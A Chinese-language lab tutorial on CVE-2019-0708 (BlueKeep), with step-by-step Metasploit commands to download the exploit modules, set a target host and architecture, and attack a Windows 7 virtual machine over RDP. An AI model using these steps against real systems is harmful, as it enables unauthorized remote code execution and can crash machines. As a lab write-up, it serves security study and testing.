漏洞描述
2019年5月14日,微軟發布了針對遠程桌面服務的關鍵遠程執行代碼漏洞CVE-2019-0708的補丁,該漏洞影響某些舊版本的Windows。攻擊者一旦成功觸發該漏洞,便可以在目標系統上執行任意代碼,該漏洞的觸發無需任何用戶交互操作。這就意味著,存在漏洞的計算機只要聯網,無需任何操作,就可能遭遇黑客遠程攻擊,運行惡意代碼。其方式與2017年WannaCry惡意軟體的傳播方式類似。成功利用此漏洞的攻擊者可以在目標系統完成安裝應用程式,查看、更改或刪除數據,創建完全訪問權限的新帳戶等操作。
影響版本
該漏洞影響舊版本的Windows系統,包括:Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。
Windows 8和Windows 10及之後版本不受此漏洞影響。
漏洞測試環境
攻擊機:kali ip:192.168.0.129
靶機:win7 ip:192.168.0.133
kali:
下載攻擊套件
wget https://raw.githubusercontent.co ... core/exploit/rdp.rb
wget https://github.com/rapid7/metasp ... /rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasp ... 19_0708_bluekeep.rb
將下面的exp分別進行替換
/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
更新msf
apt-get update
apt-get install metasploit-framework
更新之後可能顯示要更新一個插件 更新了之後就可以正常使用了
打開虛擬機win7
開放3389埠
打開kali啟動msf
搜索0708,可以看到文件成功加載
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce啟用0708RDP模塊攻擊
用show options進行參數設置
這裡只需要設置兩項,set rhosts 目標ip(我這裡是192.168.0.132,以及set target 3
set target ID數字(可選為0-4)設置受害機機器架構,wmware=3,Virtualbox=2成功利用。
有部分能成功拿到權限
到目前公開的利用代碼可用於攻擊 Windows 7 SP1 x64 與 Windows 2008 R2 x64的EXP不太穩定,針對 Windows 7 SP1 x64攻擊有藍屏現象。